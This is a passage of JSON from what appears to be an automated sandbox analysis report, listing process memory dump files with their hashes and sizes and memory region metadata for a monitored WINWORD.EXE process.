"process_dumps/process_00000010-region_00001566-addr_0x0000000000440000-size_0x0000000000009000-perm_rw.bin", "filename": "process_00000010-region_00001566-addr_0x0000000000440000-size_0x0000000000009000-perm_rw.bin", "id": "proc_dump_275", "md5_hash": "ee73c427c31570646b7b2b2f897dd778", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a9fa13136995d0bfb2e2c439bc9a6c7e2d6d144e", "sha256_hash": "2f9b2c7fc2eac38961275d47bff95e629e1c3a442562c27ca22b4ba3a3325ff4", "size": 36864, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001567-addr_0x0000000000450000-size_0x0000000000009000-perm_rw.bin", "filename": "process_00000010-region_00001567-addr_0x0000000000450000-size_0x0000000000009000-perm_rw.bin", "id": "proc_dump_276", "md5_hash": "ee73c427c31570646b7b2b2f897dd778", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a9fa13136995d0bfb2e2c439bc9a6c7e2d6d144e", "sha256_hash": "2f9b2c7fc2eac38961275d47bff95e629e1c3a442562c27ca22b4ba3a3325ff4", "size": 36864, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001568-addr_0x0000000000ac0000-size_0x0000000000024000-perm_rw.bin", "filename": "process_00000010-region_00001568-addr_0x0000000000ac0000-size_0x0000000000024000-perm_rw.bin", "id": "proc_dump_277", "md5_hash": "6849dbac5468ca1591394698aea46bba", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ca2e1d66bd1de1ec5f110a5ccfa3d555662ae08b", "sha256_hash": "5e3790f8eaecb0dee8e0f1e2eaf13e2e6a0a03ff7ec73390186907cdb0a4f60a", "size": 147456, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001569-addr_0x0000000001c80000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000010-region_00001569-addr_0x0000000001c80000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_278", "md5_hash": "135f7f7045df4d74fabd26d021f70f8c", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "030c66cd89f1e3ffdcd7e12e2736a66da1fc603c", "sha256_hash": "c82dafe4f5fe2e40007d684f5732e816cfc5c7ae163961123df2894814821a53", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001572-addr_0x0000000001b30000-size_0x0000000000048000-perm_rw.bin", "filename": "process_00000010-region_00001572-addr_0x0000000001b30000-size_0x0000000000048000-perm_rw.bin", "id": "proc_dump_279", "md5_hash": "3691e1628ede5e433388ba5c5cf8bbd1", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "029f7494b6cc3d8c6a08be9eb214dc2596ab8453", "sha256_hash": "f43800699fe0b4334df32f02e9bd1f494ef9c3400ebfa7e4ef8d7f1f0668abe4", "size": 294912, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001576-addr_0x0000000000400000-size_0x0000000000012000-perm_rw.bin", "filename": "process_00000010-region_00001576-addr_0x0000000000400000-size_0x0000000000012000-perm_rw.bin", "id": "proc_dump_280", "md5_hash": "dc582b4d875f258fc09875c0b18cc2c2", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "35d01034891c2548a921998b05995379b1a838d1", "sha256_hash": "193b81b101d3b1bd5044e39d8c508d3f55703b2e4123e6ae3486d1e9bea4af0d", "size": 73728, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001580-addr_0x0000000001d80000-size_0x0000000000048000-perm_rw.bin", "filename": "process_00000010-region_00001580-addr_0x0000000001d80000-size_0x0000000000048000-perm_rw.bin", "id": "proc_dump_281", "md5_hash": "24f06b88b5311acc46827f236c3ac8ae", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "51f6609db9ecee03cfa9b7e5909539390baf9330", "sha256_hash": "09cd38b4a0e6941b57e95f92d073bcf42cf3f86d57c528bf7cb7fe4f5e9ccd72", "size": 294912, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001584-addr_0x0000000000ac0000-size_0x0000000000012000-perm_rw.bin", "filename": "process_00000010-region_00001584-addr_0x0000000000ac0000-size_0x0000000000012000-perm_rw.bin", "id": "proc_dump_282", "md5_hash": "081e8fb4fbed5ffe9d024af32032ab76", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "17e25b6824c25bdc9bd3b01c7602ac5f6492e7bb", "sha256_hash": "0264e7df62095fe81b3ba877b416ba8e4c5094e5a5b837ba0a82cdf49a5ac496", "size": 73728, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001588-addr_0x0000000000440000-size_0x0000000000012000-perm_rw.bin", "filename": "process_00000010-region_00001588-addr_0x0000000000440000-size_0x0000000000012000-perm_rw.bin", "id": "proc_dump_283", "md5_hash": "517f44fca3cc32f6ff40b168d720db19", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "69c3fa1729103de4f32d78c4437ba8c5bf477fe9", "sha256_hash": "e21cd3a0e0c6297cf05a61966e0039e0e03294b49d81ebce95df77bd2427ac2c", "size": 73728, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001589-addr_0x0000000000420000-size_0x000000000000d000-perm_rwx.bin", "filename": "process_00000010-region_00001589-addr_0x0000000000420000-size_0x000000000000d000-perm_rwx.bin", "id": "proc_dump_284", "md5_hash": "dfbface16692896553bee3616a8207d8", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ae19f853d85f50b9c97dfa988c1cca2520c690ad", "sha256_hash": "6a0f40bf202d7e0e224267d78c5cff8277f2da2e4ffd39a65647f2b315b6cae2", "size": 53248, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001591-addr_0x0000000000460000-size_0x000000000000d000-perm_rw.bin", "filename": "process_00000010-region_00001591-addr_0x0000000000460000-size_0x000000000000d000-perm_rw.bin", "id": "proc_dump_285", "md5_hash": "5f886f19dcf9e52e2bca9cfb5dcb9a53", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "82338d348ccf7229404456a2d7fef7a0eb9224aa", "sha256_hash": "779f0fff13218bf785be4d8086d91a7b62a62771e4d099e85df9719d09c08a06", "size": 53248, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000011-region_00001592-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000011-region_00001592-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_286", "md5_hash": "f83b3f736e26bef9f76140d9822b6424", "ref_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "12f5db51e27d863953c1cbc496ee66a69820edda", "sha256_hash": "ff5f3c96d627eb61453376dad4eb30d13c6aeef1db2c5f36cfd89fbc6d721af9", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000011-region_00001648-addr_0x0000000001aa0000-size_0x0000000000170000-perm_rw.bin", "filename": "process_00000011-region_00001648-addr_0x0000000001aa0000-size_0x0000000000170000-perm_rw.bin", "id": "proc_dump_287", "md5_hash": "34b82f10a373e7e20e5b78e91781f902", "ref_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "6753cad0918823da14329a71da524c2acd7f0f7d", "sha256_hash": "135481b131a8f8a99f33935b004f44e9266c531869c9ff0b6cac29c440aef60c", "size": 1507328, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000011-region_00001650-addr_0x0000000000430000-size_0x0000000000024000-perm_rw.bin", "filename": "process_00000011-region_00001650-addr_0x0000000000430000-size_0x0000000000024000-perm_rw.bin", "id": "proc_dump_288", "md5_hash": "6849dbac5468ca1591394698aea46bba", "ref_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ca2e1d66bd1de1ec5f110a5ccfa3d555662ae08b", "sha256_hash": "5e3790f8eaecb0dee8e0f1e2eaf13e2e6a0a03ff7ec73390186907cdb0a4f60a", "size": 147456, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000011-region_00001653-addr_0x0000000000410000-size_0x0000000000009000-perm_rw.bin", "filename": "process_00000011-region_00001653-addr_0x0000000000410000-size_0x0000000000009000-perm_rw.bin", "id": "proc_dump_289", "md5_hash": "ee73c427c31570646b7b2b2f897dd778", "ref_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a9fa13136995d0bfb2e2c439bc9a6c7e2d6d144e", "sha256_hash": "2f9b2c7fc2eac38961275d47bff95e629e1c3a442562c27ca22b4ba3a3325ff4", "size": 36864, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000011-region_00001654-addr_0x0000000001940000-size_0x0000000000024000-perm_rw.bin", "filename": "process_00000011-region_00001654-addr_0x0000000001940000-size_0x0000000000024000-perm_rw.bin", "id": "proc_dump_290", "md5_hash": "6849dbac5468ca1591394698aea46bba", "ref_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ca2e1d66bd1de1ec5f110a5ccfa3d555662ae08b", "sha256_hash": "5e3790f8eaecb0dee8e0f1e2eaf13e2e6a0a03ff7ec73390186907cdb0a4f60a", "size": 147456, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000011-region_00001655-addr_0x0000000001970000-size_0x0000000000009000-perm_rw.bin", "filename": "process_00000011-region_00001655-addr_0x0000000001970000-size_0x0000000000009000-perm_rw.bin", "id": "proc_dump_291", "md5_hash": "ee73c427c31570646b7b2b2f897dd778", "ref_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a9fa13136995d0bfb2e2c439bc9a6c7e2d6d144e", "sha256_hash": "2f9b2c7fc2eac38961275d47bff95e629e1c3a442562c27ca22b4ba3a3325ff4", "size": 36864, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000011-region_00001700-addr_0x0000000001980000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000011-region_00001700-addr_0x0000000001980000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_292", "md5_hash": "77f5917e37e3b7a579585c30a4bae28b", "ref_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "c143a2efea07148240be090a07ad83dd51a98545", "sha256_hash": "b23dc13fdd4dc5dd62745b576f612036f2d43b05079ce97332b36d59e3760f8e", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000011-region_00001765-addr_0x0000000001eb0000-size_0x0000000000160000-perm_rw.bin", "filename": "process_00000011-region_00001765-addr_0x0000000001eb0000-size_0x0000000000160000-perm_rw.bin", "id": "proc_dump_293", "md5_hash": "6137dd4d25736229153eed1eccc9a2a4", "ref_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0637733e340d09eb8ab0f7ea642643c6795d047c", "sha256_hash": "15c39f3dc57e89550f016d8d8e7d2a3b2ca00a26c55d6260f32ab331169ff0b4", "size": 1441792, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000011-region_00001767-addr_0x0000000002010000-size_0x0000000000140000-perm_rw.bin", "filename": "process_00000011-region_00001767-addr_0x0000000002010000-size_0x0000000000140000-perm_rw.bin", "id": "proc_dump_294", "md5_hash": "aa9a79f5d493768139d70f134065c2ab", "ref_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "57e171aa5a33024f9adee2007d75eb7811f78c1e", "sha256_hash": "94f949772fb65b5a89d807945c27985771aab4eee1c4a8e3c0652992c0e02130", "size": 1310720, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000011-region_00001774-addr_0x0000000001bc0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000011-region_00001774-addr_0x0000000001bc0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_295", "md5_hash": "6f4133579d081ffe260081e35f703dea", "ref_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1b969baef0fb313b79b1904ecc5f6512a5abfce9", "sha256_hash": "7bd973e7a614c7a3015e9596f8de2f8949f02d27165c40688d0096b74607b007", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000011-region_00001778-addr_0x0000000001cb0000-size_0x0000000000080000-perm_rw.bin", "filename": "process_00000011-region_00001778-addr_0x0000000001cb0000-size_0x0000000000080000-perm_rw.bin", "id": "proc_dump_296", "md5_hash": "86358825013934d9dfa1976d342f7491", "ref_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "504175e736ccc203683d128322f43f5a83e578b8", "sha256_hash": "9f7fac118cfd4aee55a69cd916ddb47232ec7dad9cad35d622c7fd96ae573c62", "size": 524288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000011-region_00001779-addr_0x0000000001cb0000-size_0x0000000000040000-perm_rw.bin", "filename": "process_00000011-region_00001779-addr_0x0000000001cb0000-size_0x0000000000040000-perm_rw.bin", "id": "proc_dump_297", "md5_hash": "dc8982cfb2d7d1ed2f1ddd8e3cc7d5be", "ref_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "622ec604175397f0d33207e3324e5d4c656d140f", "sha256_hash": "4900d38a5e2b7e069f5cfe1cb11781e8348a95b1217af9d053919524928eb1bb", "size": 262144, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000011-region_00001781-addr_0x0000000001cb0000-size_0x0000000000010000-perm_rw.bin", "filename": "process_00000011-region_00001781-addr_0x0000000001cb0000-size_0x0000000000010000-perm_rw.bin", "id": "proc_dump_298", "md5_hash": "5dce99cab68918b8ad71e8a550523f8d", "ref_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "34e0579cd259cba3162b904ebfdebaa8dae110d6", "sha256_hash": "fe33633f75b440a4f36845fa02e627247aa59e2d8648103d5158d6231eac4eec", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000011-region_00001810-addr_0x0000000002430000-size_0x00000000000a6000-perm_rw.bin", "filename": "process_00000011-region_00001810-addr_0x0000000002430000-size_0x00000000000a6000-perm_rw.bin", "id": "proc_dump_299", "md5_hash": "d2b32fa0e1d73df58c99702e443ec879", "ref_process": { "ref_id": "proc_11", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "359c9c31d7cb4378384cdfc4793bf25274f92d75", "sha256_hash": "3d6d96df1e69407e2eaac6fdb6fbe73fe274186dde5c3e8453d93f562cfe6eb5", "size": 679936, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000012-region_00001832-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000012-region_00001832-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_300", "md5_hash": "49101d9ee50e7412f61af22be285b81f", "ref_process": { "ref_id": "proc_12", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "3e7b93e405427ac723ac196a9a1d75cbae3f08df", "sha256_hash": "0b272db0e6ff79dccc418be0d4dce826b3bc6163046126f72fef0d326d255323", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000013-region_00001843-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000013-region_00001843-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_301", "md5_hash": "98eb7d15411ba4ce2dc0ba4cdba19356", "ref_process": { "ref_id": "proc_13", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "e424ee6d3d9c935d431787b037afb58db0466921", "sha256_hash": "0dc681622c396ffc3f8df88979f7f9f6c43aaa14291deaab5cd18bb270cd3397", "size": 131072, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000013-region_00001889-addr_0x0000000000420000-size_0x00000000001f0000-perm_rw.bin", "filename": "process_00000013-region_00001889-addr_0x0000000000420000-size_0x00000000001f0000-perm_rw.bin", "id": "proc_dump_302", "md5_hash": "be3104ab7e9859631658349e4304a35e", "ref_process": { "ref_id": "proc_13", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "14af18bf4584f850799288969d7fa8ee1d7a8c58", "sha256_hash": "b5afa04785a6d75fbd6e8a877e20aa772562f22fdbbcc126b9e5fe8156d8af05", "size": 2031616, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000013-region_00001995-addr_0x0000000000610000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000013-region_00001995-addr_0x0000000000610000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_304", "md5_hash": "135f7f7045df4d74fabd26d021f70f8c", "ref_process": { "ref_id": "proc_13", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "030c66cd89f1e3ffdcd7e12e2736a66da1fc603c", "sha256_hash": "c82dafe4f5fe2e40007d684f5732e816cfc5c7ae163961123df2894814821a53", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000013-region_00002008-addr_0x0000000000af0000-size_0x0000000000140000-perm_rw.bin", "filename": "process_00000013-region_00002008-addr_0x0000000000af0000-size_0x0000000000140000-perm_rw.bin", "id": "proc_dump_305", "md5_hash": "aa9a79f5d493768139d70f134065c2ab", "ref_process": { "ref_id": "proc_13", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "57e171aa5a33024f9adee2007d75eb7811f78c1e", "sha256_hash": "94f949772fb65b5a89d807945c27985771aab4eee1c4a8e3c0652992c0e02130", "size": 1310720, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000013-region_00002016-addr_0x0000000000570000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000013-region_00002016-addr_0x0000000000570000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_306", "md5_hash": "2051a0224916f407fa3079f8eac72063", "ref_process": { "ref_id": "proc_13", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "c53df2ddef842dde56faeacd0d021e058fd7776d", "sha256_hash": "ba1b2a464466d02d8de6d98022ce98c7b3e3ae3c87920cb2241b36f356e14e89", "size": 102400, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000014-region_00001916-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "filename": "process_00000014-region_00001916-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "id": "proc_dump_303", "md5_hash": "2d2712a1995df0328bbdeb2c2dc4f9cb", "ref_process": { "ref_id": "proc_14", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "31fd2d4b51f2dd89d6607eb00b1f59b9a445aab3", "sha256_hash": "09b776898644870117dec41617803736e722de838c1c051af6045021b102f211", "size": 131072, "type": "process_dump", "version": 1 } ], "processes": [ { "cmd_line": "\"C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE\"", "filename": "c:\\program files\\microsoft office\\office15\\winword.exe", "id": "proc_1", "image_name": "winword.exe", "monitor_reason": "analysis_target", "monitored_id": 1, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_136", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:12.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_137", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:12.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_138", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:12.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_139", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:12.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1327103, "entry_point": 0, "filename": null, "id": "region_140", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:00:12.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1798143, "entry_point": 1376256, "filename": "\\Windows\\System32\\locale.nls", "id": "region_141", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:00:12.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1839103, "entry_point": 0, "filename": null, "id": "region_142", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1908735, "entry_point": 0, "filename": null, "id": "region_143", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1974271, "entry_point": 0, "filename": null, "id": "region_144", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_145", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2101247, "entry_point": 0, "filename": null, "id": "region_146", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2228223, "entry_point": 0, "filename": null, "id": "region_147", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2236415, "entry_point": 0, "filename": null, "id": "region_148", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 3342335, "entry_point": 0, "filename": null, "id": "region_149", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 200704, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3543039, "entry_point": 0, "filename": null, "id": "region_150", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3645439, "entry_point": 0, "filename": null, "id": "region_151", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3735551, "entry_point": 0, "filename": null, "id": "region_152", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3764223, "entry_point": 0, "filename": null, "id": "region_153", "name": "pagefile_0x0000000000390000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3735552, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 3809279, "entry_point": 0, "filename": null, "id": "region_154", "name": "pagefile_0x00000000003a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3801088, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3870719, "entry_point": 0, "filename": null, "id": "region_155", "name": "private_0x00000000003b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3866624, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 0, "filename": null, "id": "region_156", "name": "private_0x00000000003c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3932160, "timestamp": "00:00:12.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4005887, "entry_point": 0, "filename": null, "id": "region_157", "name": "pagefile_0x00000000003d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3997696, "timestamp": 